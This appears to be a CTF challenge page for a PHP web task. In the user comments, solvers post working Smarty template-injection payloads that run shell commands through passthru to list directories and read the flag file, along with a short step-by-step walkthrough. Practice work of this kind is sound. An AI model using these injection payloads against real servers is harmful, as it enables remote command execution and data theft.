聪明的phpWEB 未解决

分数: 25 金币: 2
题目作者: midi
一  血: Lazzaro
一血奖励: 3金币
解  决: 4168
提  示:
描  述:
聪明的php
评论
灵梦归希 23天前

这道题可以加大难度的。把_14781改为flag.txt就可以了.只是套一层娃而已

回复 0

icyskin 1月前

http://160.202.254.160:17350/?key={{passthru(%27tail%20-100%20/_14781%27)}}

回复 0

fuhaiyan 8月前

?a={{passthru('more ../../../*|grep fla')}}

回复 4

对对对对对对对对 9月前

?key={{passthru(%27tac%20/_4427%27)}}

回复 0

anony 1年前

flag{********}

回复 0

人闲桂花落 1年前

tac命令读取也可

回复 0

docker0w 2年前

1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获

回复 4

bx33661 2年前

?key={passthru("tac%20/_28710")}

回复 0

yun20231227 2年前

?key={{passthru('ls /')}}

回复 1

xinkuang 2年前

http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}

回复 1

WriteUp

image
midi

3 金币

评分(13)

解题动态

farsight 攻破了该题 1天前
miroy 攻破了该题 2天前
wjiarui 攻破了该题 2天前
no or yes 攻破了该题 4天前
shellbei 攻破了该题 4天前
fakedam 攻破了该题 4天前
布蕾脆脆奶芙 攻破了该题 5天前
假若今夜来临 攻破了该题 5天前
Turbo_Lonely 攻破了该题 7天前
关山月 攻破了该题 8天前
TryShallow 攻破了该题 9天前
whshkdh 攻破了该题 12天前
Ocean_Zhang 攻破了该题 12天前
KDAtc 攻破了该题 12天前
AyanamiRei 攻破了该题 13天前
最爱超级大芒果 攻破了该题 13天前
hound 攻破了该题 13天前
i8vkmmju 攻破了该题 13天前
suiyue11111 攻破了该题 14天前
lyosauway 攻破了该题 14天前
问题反馈